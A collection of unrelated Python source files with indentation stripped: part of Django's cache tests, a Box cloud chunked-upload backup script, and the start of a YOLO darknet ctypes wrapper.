middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
box_backup.py
|
#!/usr/bin/python3
# The MIT License (MIT)
#
# Copyright (c) 2017 Kyle Barlow
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
box_backup.py
Pip requirements: boxsdk>=2.0.0a9 oauth2client keyring
System package requirement: python-dbus system package is needed to use keyring with Linux, so create a virtualenv with --system-site-packages. You probably already have this.
'''
import os
import sys
import json
import webbrowser
import argparse
import getpass
import hashlib
import datetime
import base64
import math
import threading
import queue
import time
import random
from io import DEFAULT_BUFFER_SIZE
import boxsdk
from boxsdk import Client, LoggingClient
UPLOAD_URL = boxsdk.config.API.UPLOAD_URL
BOX_MAX_FILE_SIZE = 10737418240 # 10 GiB. The max is actually 15 GB, but 10 seems like a nice round number
BOX_MIN_CHUNK_UPLOAD_SIZE = 60000000 # 60 MB. Current min is actually 50 MB.
MAX_CHUNK_ATTEMPTS = 5 # Maximum number of times to try uploading a particular chunk
CLIENT_SECRETS_PATH = '/kortemmelab/shared/box-client_secrets.json'
import oauth2client
from oauth2client.contrib.keyring_storage import Storage
from oauth2client import tools
from .Reporter import Reporter
class FolderTraversalException(Exception):
pass
class OAuthConnector(boxsdk.OAuth2):
'''
Overrides the Box OAuth class with calls to the matching oauth2client Credentials functions
'''
def __init__(
self,
credentials
):
self._credentials = credentials
self._current_chunked_upload_abort_url = None
@property
def access_token(self):
"""
Get the current access token.
:return:
current access token
:rtype:
`unicode`
"""
return self._credentials.get_access_token().access_token
def get_authorization_url(self, redirect_url):
raise Exception('Not implemented')
def authenticate(self, auth_code):
"""
:return:
(access_token, refresh_token)
:rtype:
(`unicode`, `unicode`)
"""
return self.access_token, None
def refresh(self, access_token_to_refresh):
return self.access_token, None
def send_token_request(self, data, access_token, expect_refresh_token=True):
"""
:return:
The access token and refresh token.
:rtype:
(`unicode`, `unicode`)
"""
return self.access_token, None
def revoke(self):
"""
Revoke the authorization for the current access/refresh token pair.
"""
http = transport.get_http_object()
self._credentials.revoke(http)
class BoxAPI:
def __init__(self):
storage = Storage('klab_box_sync', getpass.getuser())
self.credentials = storage.get()
if self.credentials == None:
parser = argparse.ArgumentParser(parents=[tools.argparser])
flags = parser.parse_args()
flow = oauth2client.client.flow_from_clientsecrets(CLIENT_SECRETS_PATH, scope='', redirect_uri = 'http://localhost:8080')
self.credentials = tools.run_flow(flow, storage, flags)
self.oauth_connector = OAuthConnector(self.credentials)
self.client = Client( self.oauth_connector ) # Replace this with LoggingClient for debugging
self.root_folder = self.client.folder( folder_id = '0' )
self._upload_test_only = False # Don't perform actual uploads if True. Was used to debug memory leaks.
def _find_folder_by_name_inner( self, folder_id, name, limit = 500 ):
search_folder = self.client.folder( folder_id = folder_id )
offset = 0
search_folders = search_folder.get_items( limit = limit, offset = offset )
while len(search_folders) > 0:
folders = [ f for f in search_folders if f['name'] == name and f['type'] == 'folder' ]
if len( folders ) == 1:
return folders[0]['id']
offset += limit
search_folders = search_folder.get_items( limit = limit, offset = offset )
return None
def create_folder( self, root_folder_id, folder_name ):
# Creates a folder in Box folder folder_id if it doesn't exist already
folder_id = self._find_folder_by_name_inner( root_folder_id, folder_name )
if folder_id == None:
return self.client.folder( folder_id = root_folder_id ).create_subfolder(folder_name ).id
else:
return folder_id
def find_file( self, folder_id, basename, limit = 500 ):
'''
Finds a file based on a box path
Returns a list of file IDs
Returns multiple file IDs if the file was split into parts with the extension '.partN' (where N is an integer)
'''
search_folder = self.client.folder( folder_id = folder_id )
offset = 0
search_items = search_folder.get_items( limit = limit, offset = offset )
found_files = []
while len(search_items) > 0:
files = [ (f['id'], f['name']) for f in search_items if f['name'].startswith( basename ) and f['type'] == 'file' ]
files.sort()
for f_id, f_name in files:
assert(
f_name == basename
or
( f_name.startswith( basename ) and f_name[len(basename):len(basename)+5] == '.part' )
)
found_files.extend( files )
offset += limit
search_items = search_folder.get_items( limit = limit, offset = offset )
return [f[0] for f in found_files]
def find_folder_path( self, folder_path ):
current_folder_id = '0'
for folder_name in os.path.normpath(folder_path).split(os.path.sep):
if len(folder_name) > 0:
current_folder_id = self._find_folder_by_name_inner( current_folder_id, folder_name )
return current_folder_id
def upload( self,
destination_folder_id,
source_path,
preflight_check = True,
verify = False, # After upload, check sha1 sums
lock_file = True, # By default, lock uploaded files to prevent changes (unless manually unlocked)
maximum_attempts = 5, # Number of times to retry upload after any exception is encountered
verbose = True,
chunked_upload_threads = 5,
):
for trial_counter in range( maximum_attempts ):
try:
file_size = os.stat(source_path).st_size
uploaded_file_ids = []
if file_size >= BOX_MAX_FILE_SIZE:
uploaded_file_ids = self._upload_in_splits( destination_folder_id, source_path, preflight_check, verbose = verbose, chunked_upload_threads = chunked_upload_threads )
else:
# File will not be uploaded in splits, and that function will check if each split already exists
# So now we are going to check if the file already exists
# We won't check if the file is actually the same here, that happens below at the verify step
uploaded_box_file_ids = self.find_file( destination_folder_id, os.path.basename( source_path ) )
if len(uploaded_box_file_ids) != 1:
if file_size >= BOX_MIN_CHUNK_UPLOAD_SIZE: # 55 MB
uploaded_file_ids = [ self._chunked_upload( destination_folder_id, source_path, preflight_check = preflight_check, verbose = verbose, upload_threads = chunked_upload_threads, ) ]
else:
if not self._upload_test_only:
uploaded_file_ids = [ self.client.folder( folder_id = destination_folder_id ).upload( file_path = source_path, preflight_check = preflight_check, preflight_expected_size = file_size ).get().response_object['id'] ]
if lock_file:
self.lock_files( uploaded_file_ids )
if verify:
if not self.verify_uploaded_file( destination_folder_id, source_path ):
return False
return True
except:
if maximum_attempts > 1 and verbose:
print(( 'Uploading file {0} failed attempt {1} of {2}'.format(source_path, trial_counter+1, maximum_attempts) ))
elif maximum_attempts == 1:
raise
return False
def lock_files( self, file_ids, prevent_download = False ):
for file_id in file_ids:
self.lock_file( file_id, prevent_download = prevent_download )
def lock_file( self, file_id, prevent_download = False ):
self.client.file( file_id = file_id ).lock()
def verify_uploaded_file(
self,
destination_folder_id,
source_path,
verbose = True,
):
'''
Verifies the integrity of a file uploaded to Box
'''
source_file_size = os.stat(source_path).st_size
total_part_size = 0
file_position = 0
uploaded_box_file_ids = self.find_file( destination_folder_id, os.path.basename( source_path ) )
total_sha1 = hashlib.sha1()
for i, file_id in enumerate(uploaded_box_file_ids):
file_info = self.client.file( file_id = file_id ).get()
uploaded_sha1 = file_info.response_object['sha1']
uploaded_size = file_info.response_object['size']
part_sha1 = read_sha1( source_path, start_byte = file_position, read_size = uploaded_size, extra_hashers = [total_sha1] )
if part_sha1.hexdigest() != uploaded_sha1:
print( '\n' )
print(( 'Part sha1: ' + part_sha1.hexdigest() ))
print(( 'Uploaded sha1: ' + uploaded_sha1 ))
print(('Sha1 hash of uploaded file {0} ({1}) does not match'.format(file_info.response_object['name'], file_id) ))
return False
file_position += uploaded_size
total_part_size += uploaded_size
if len(uploaded_box_file_ids) > 1:
print(( 'Finished verifying part {0} of {1} of {2}'.format( i+1, len(uploaded_box_file_ids), file_id ) ))
assert( source_file_size == total_part_size )
if verbose:
print(( 'Verified uploaded file {0} ({1}) with sha1: {2}'.format(source_path, file_id, total_sha1.hexdigest()) ))
return True
def _upload_in_splits( self, destination_folder_id, source_path, preflight_check, verbose = True, chunked_upload_threads = 5 ):
'''
Since Box has a maximum file size limit (15 GB at time of writing),
we need to split files larger than this into smaller parts, and chunk upload each part
'''
file_size = os.stat(source_path).st_size
split_size = BOX_MAX_FILE_SIZE
# Make sure that the last split piece is still big enough for a chunked upload
while file_size % split_size < BOX_MIN_CHUNK_UPLOAD_SIZE:
split_size -= 1000
if split_size < BOX_MIN_CHUNK_UPLOAD_SIZE:
raise Exception('Lazy programming error')
split_start_byte = 0
part_count = 0
uploaded_file_ids = []
while split_start_byte < file_size:
dest_file_name = '{0}.part{1}'.format( os.path.basename(source_path), part_count)
prev_uploaded_file_ids = self.find_file( destination_folder_id, dest_file_name )
if len( prev_uploaded_file_ids ) == 1:
if verbose:
print(( '\nSkipping upload of split {0} of {1}; already exists'.format( part_count + 1, math.ceil(file_size / split_size) ) ))
uploaded_file_ids.extend( prev_uploaded_file_ids )
else:
if verbose:
print(( '\nUploading split {0} of {1}'.format( part_count + 1, math.ceil(file_size / split_size) ) ))
uploaded_file_ids.append( self._chunked_upload(
destination_folder_id, source_path,
dest_file_name = dest_file_name,
split_start_byte = split_start_byte,
file_size = min(split_size, file_size - split_start_byte), # Take the min of file_size - split_start_byte so that the last part of a split doesn't read into the next split
preflight_check = preflight_check,
verbose = verbose,
upload_threads = chunked_upload_threads,
) )
part_count += 1
split_start_byte += split_size
return uploaded_file_ids
def _abort_chunked_upload(self):
delete_response = box.client.session.delete( self._current_chunked_upload_abort_url, expect_json_response = False )
assert( delete_response.status_code == 204 )
assert( len(delete_response.content) == 0 )
self._current_chunked_upload_abort_url = None
def _chunked_upload(
self,
destination_folder_id,
source_path,
dest_file_name = None,
split_start_byte = 0,
file_size = None,
preflight_check = True,
upload_threads = 5, # Your results may vary
verbose = True,
):
dest_file_name = dest_file_name or os.path.basename( source_path )
file_size = file_size or os.stat(source_path).st_size
destination_folder = self.client.folder( folder_id = destination_folder_id )
if preflight_check and not self._upload_test_only:
destination_folder.preflight_check( size = file_size, name = dest_file_name )
url = '{0}/files/upload_sessions'.format(UPLOAD_URL)
data = json.dumps({
'folder_id' : destination_folder_id,
'file_size' : file_size,
'file_name' : dest_file_name,
})
if self._upload_test_only:
json_response = {
'id' : 0,
'part_size' : 5000000, # 5 MB
'session_endpoints' : { 'abort' : None },
'total_parts' : math.ceil( float(file_size) / float(5000000) ),
}
else:
json_response = self.client.session.post(url, data=data, expect_json_response=True).json()
self._current_chunked_upload_abort_url = json_response['session_endpoints']['abort']
upload_responses = {
'create' : json_response,
'parts' : {},
}
session_id = json_response['id']
part_size = json_response['part_size']
reporter = Reporter( 'uploading ' + source_path + ' as ' + dest_file_name, entries = 'chunks', print_output = verbose )
reporter.set_total_count( json_response['total_parts'] )
uploads_complete = threading.Event()
totally_failed = threading.Event()
chunk_queue = queue.PriorityQueue()
results_queue = queue.PriorityQueue()
def upload_worker():
while (not uploads_complete.is_set()) and (not totally_failed.is_set()):
try:
part_n, args = chunk_queue.get(True, 0.3)
except queue.Empty:
continue
source_path, start_byte, header_start_byte, read_amount, attempt_number = args
attempt_number += 1
try:
sha1 = hashlib.sha1()
with open( source_path, 'rb' ) as f:
f.seek( start_byte )
data = f.read( read_amount )
sha1.update(data)
headers['digest'] = 'sha=' + base64.b64encode(sha1.digest()).decode()
headers['content-range'] = 'bytes {0}-{1}/{2}'.format( header_start_byte, header_start_byte + len(data) - 1, file_size )
if self._upload_test_only:
results_queue.put( (part_n, {'part' : part_n}) )
else:
part_response = self.client.session.put(url, headers = headers, data = data, expect_json_response = True)
results_queue.put( (part_n, dict(part_response.json())) )
reporter.increment_report()
except:
if attempt_number >= MAX_CHUNK_ATTEMPTS:
if verbose:
print(( '\nSetting total failure after attempt {0} for part_n {1}\n'.format( attempt_number, part_n ) ))
totally_failed.set()
else:
chunk_queue.put( (part_n, (source_path, start_byte, header_start_byte, read_amount, attempt_number) ) )
chunk_queue.task_done()
upload_worker_threads = []
for i in range( upload_threads ):
t = threading.Thread( target = upload_worker )
t.start()
upload_worker_threads.append(t)
for part_n in range( json_response['total_parts'] ):
header_start_byte = part_n * part_size
start_byte = split_start_byte + header_start_byte
url = '{0}/files/upload_sessions/{1}'.format( UPLOAD_URL, session_id )
headers = {
'content-type' : 'application/octet-stream',
}
read_amount = min(part_size, file_size - header_start_byte) # Make sure the last part of a split doesn't read into the next split
if not read_amount > 0:
if verbose:
print((read_amount, part_size, file_size, start_byte))
raise Exception('read_amount failure')
upload_args = (source_path, start_byte, header_start_byte, read_amount, 0) # Last 0 is attempt number
chunk_queue.put( (part_n, upload_args) )
total_sha = hashlib.sha1()
def read_total_hash_worker():
# We are reading the file for a second time just for hashing here, but that seems
# better than trying to save the whole file in memory for hashing at the end.
# The upload should be slower and ongoing in the background as well
for part_n in range( json_response['total_parts'] ):
if totally_failed.is_set():
break
header_start_byte = part_n * part_size
start_byte = split_start_byte + part_n * part_size
read_amount = min(part_size, file_size - header_start_byte) # Make sure the last part of a split doesn't read into the next split
with open( source_path, 'rb' ) as f:
f.seek( start_byte )
data = f.read( read_amount )
total_sha.update(data)
total_hasher = threading.Thread( target = read_total_hash_worker )
total_hasher.start()
# Wait for everything to finish or fail
chunk_queue.join()
uploads_complete.set()
if totally_failed.is_set():
# Cancel chunked upload upon exception
self._abort_chunked_upload()
if verbose:
print(( 'Chunk upload of file {0} (in {1} parts) cancelled'.format(source_path, json_response['total_parts']) ))
raise Exception('Totally failed upload')
reporter.done()
if total_hasher.isAlive():
if verbose:
print( 'Waiting to compute total hash of file' )
total_hasher.join()
while not results_queue.empty():
part_n, part_response = results_queue.get()
upload_responses['parts'][part_n] = part_response['part']
# Commit
try:
if verbose:
print( 'Committing file upload' )
url = '{0}/files/upload_sessions/{1}/commit'.format( UPLOAD_URL, session_id )
data = json.dumps({
'parts' : [ upload_responses['parts'][part_n] for part_n in range( json_response['total_parts'] ) ],
})
headers = {}
headers['digest'] = 'sha=' + base64.b64encode(total_sha.digest()).decode()
if self._upload_test_only:
commit_response = {}
else:
commit_response = self.client.session.post(url, headers=headers, data=data, expect_json_response=True).json()
upload_responses['commit'] = commit_response
except:
# Cancel chunked upload upon exception
self._abort_chunked_upload()
if verbose:
print(( 'Chunk upload of file {0} (in {1} parts) cancelled'.format(source_path, json_response['total_parts']) ))
raise
self._current_chunked_upload_abort_url = None
if self._upload_test_only:
return None
else:
file_ids = self.find_file( destination_folder_id, dest_file_name )
assert( len(file_ids) == 1 )
return file_ids[0]
def upload_path( self, upload_folder_id, fpath, verbose = True, lock_files = True, maximum_attempts = 5, retry_already_uploaded_files = False, write_marker_files = False, outer_upload_threads = 5, upload_in_random_order = True ):
# Will upload a file, or recursively upload a folder, leaving behind verification files in its wake
assert( os.path.exists( fpath ) )
big_batch_threshold = 10 # Verbosity is higher if the total files to upload is less than this
def find_files_recursive( search_path, outer_folder_id ):
# This function also creates missing Box folders as it searches the local filesystem
if os.path.isfile(search_path):
if search_path.endswith('.uploadedtobox'):
return []
return [ (search_path, outer_folder_id) ]
else:
inner_folder_id = box.create_folder( outer_folder_id, os.path.basename(search_path) )
found_files = []
for x in os.listdir( search_path ):
found_files.extend( find_files_recursive( os.path.join( search_path, x ), inner_folder_id ) )
return found_files
if verbose:
print(( 'Recursively searching for files to upload in:', fpath ))
files_to_upload = find_files_recursive( fpath, upload_folder_id )
if verbose:
print(( 'Found {} files to upload'.format(len(files_to_upload)) ))
if len(files_to_upload) >= big_batch_threshold:
r = Reporter( 'uploading big batch of files to Box', entries = 'files', eol_char = '\r' )
else:
r = Reporter( 'uploading batch of files to Box', entries = 'files', eol_char = '\n' )
r.set_total_count( len(files_to_upload) )
files_to_upload.sort()
files_to_upload_queue = queue.PriorityQueue()
results_queue = queue.Queue()
uploads_complete = threading.Event()
def upload_worker():
while not uploads_complete.is_set():
try:
i, source_path_upload, folder_to_upload_id, call_upload_verbose, uploaded_marker_file = files_to_upload_queue.get(True, 0.3)
except queue.Empty:
continue
upload_successful = False
file_totally_failed = False
for trial_counter in range( maximum_attempts ):
if file_totally_failed:
break
try:
upload_successful = self.upload( folder_to_upload_id, source_path_upload, verify = False, lock_file = lock_files, maximum_attempts = 1, verbose = call_upload_verbose, chunked_upload_threads = 3 )
except Exception as e:
print(e)
upload_successful = False
if not upload_successful:
if maximum_attempts > 1:
print(( 'Uploading file {0} failed upload in attempt {1} of {2}'.format(source_path_upload, trial_counter+1, maximum_attempts) ))
continue
try:
if not self.verify_uploaded_file( folder_to_upload_id, source_path_upload, verbose = call_upload_verbose ):
upload_successful = False
except Exception as e:
print(e)
upload_successful = False
if not upload_successful:
if maximum_attempts > 1:
print(( 'Uploading file {0} failed verification in attempt {1} of {2}. Removing and potentially retrying upload.'.format(source_path_upload, trial_counter+1, maximum_attempts) ))
try:
file_ids = self.find_file( folder_to_upload_id, os.path.basename( source_path_upload ) )
except Exception as e:
print(e)
file_ids = []
for file_id in file_ids:
try:
self.client.file( file_id = file_id ).delete()
except:
print(( 'Delete failed, skipping file ' + source_path_upload ))
file_totally_failed = True
upload_successful = False
continue
break
results_queue.put( (source_path_upload, folder_to_upload_id, upload_successful, uploaded_marker_file) )
files_to_upload_queue.task_done()
if len(files_to_upload) >= big_batch_threshold:
inner_verbosity = False
else:
inner_verbosity = True
i = 0
for file_path, inner_folder_id in files_to_upload:
uploaded_marker_file = file_path + '.uploadedtobox'
if os.path.isfile( uploaded_marker_file ):
if retry_already_uploaded_files:
os.remove( uploaded_marker_file )
else:
print(( 'Skipping already uploaded file: ' + file_path ))
r.decrement_total_count()
continue
# Since we are putting into a sorted PriorityQueue, we add a random first tuple member if randomness is desired
if upload_in_random_order:
worker_args = (random.random(), file_path, inner_folder_id, inner_verbosity, uploaded_marker_file)
else:
worker_args = (i, file_path, inner_folder_id, inner_verbosity, uploaded_marker_file)
files_to_upload_queue.put( worker_args )
i += 1
upload_worker_threads = []
for i in range( outer_upload_threads ):
t = threading.Thread( target = upload_worker )
t.start()
upload_worker_threads.append(t)
failed_files = queue.PriorityQueue()
def results_worker():
while not uploads_complete.is_set():
try:
source_path_upload, folder_to_upload_id, upload_successful, uploaded_marker_file = results_queue.get(True, 0.95)
except queue.Empty:
continue
if upload_successful:
if write_marker_files:
try:
with open(uploaded_marker_file, 'w') as f:
f.write( str( datetime.datetime.now() ) )
except:
# Sometimes this might fail if we have a permissions error (e.g. uploading a file in a directory where we only have read permission), so we just ignore
pass
else:
print(( 'Totally failed:', file_path ))
failed_files.put( file_path )
if os.path.isfile(uploaded_marker_file):
os.remove(uploaded_marker_file)
r.increment_report()
results_worker_thread = threading.Thread( target = results_worker )
results_worker_thread.start()
files_to_upload_queue.join()
uploads_complete.set()
for t in upload_worker_threads:
t.join()
results_worker_thread.join()
failed_files_list = []
while not failed_files.empty():
failed_files_list.append( failed_files.get() )
return failed_files_list
def read_sha1(
file_path,
buf_size = None,
start_byte = 0,
read_size = None,
extra_hashers = [], # update(data) will be called on all of these
):
'''
Determines the sha1 hash of a file in chunks, to prevent loading the entire file at once into memory
'''
read_size = read_size or os.stat(file_path).st_size
buf_size = buf_size or DEFAULT_BUFFER_SIZE
data_read = 0
total_sha1 = hashlib.sha1()
while data_read < read_size:
with open( file_path, 'rb', buffering = 0 ) as f:
f.seek( start_byte )
data = f.read( min(buf_size, read_size - data_read) )
assert( len(data) > 0 )
total_sha1.update( data )
for hasher in extra_hashers:
hasher.update( data )
data_read += len(data)
start_byte += len(data)
assert( data_read == read_size )
return total_sha1
if __name__ == '__main__':
import argparse
box = BoxAPI()
parser = argparse.ArgumentParser(description='Upload files to Box')
parser.add_argument('--nolock', dest='lock', action='store_false', help='Do not lock files after upload')
parser.set_defaults( lock = True )
parser.set_defaults( markers = False )
parser.add_argument('--writemarkers', dest='markers', action='store_true', help='Write marker files to indicate an upload succeeded')
parser.add_argument('destination_folder', help='File path (in Box system) of destination folder')
parser.add_argument('file_or_folder_to_upload', nargs='+', help='Path (on local file system) of file(s) or folder(s) to upload to Box. If argument is a folder, all files in that folder (non-recursive) will be uploaded to the destination folder.')
args = parser.parse_args()
upload_folder_id = box.find_folder_path( args.destination_folder )
print(( 'Upload destination folder id: {0} {1}'.format( upload_folder_id, args.destination_folder ) ))
failed_uploads = []
for path_to_upload in sorted( args.file_or_folder_to_upload ):
failed_uploads.extend( box.upload_path( upload_folder_id, path_to_upload, lock_files = args.lock, write_marker_files = args.markers ) )
if len(failed_uploads) > 0:
print( '\nAll failed uploads:' )
print( failed_uploads )
with open( 'failed_uploads.txt', 'w' ) as f:
f.write( str(failed_uploads) )
|
darknet1.py
|
#!python3
'''
##############################
### Receive Video stream #####
### from Android client #######
### Use yolo to do detect ####
## (return a message to the mobile device) ##
##############################
'''
from ctypes import *
import math
import random
import os
import socket
import time
import cv2
import numpy as np
from PIL import Image
import sys
import pickle
import struct
import timeit
import time
import threading
import ctypes
# generate different colors for different classes
COLORS = np.random.uniform(0, 255, size=(80,3))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
lib = CDLL("/home/vYOLO/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
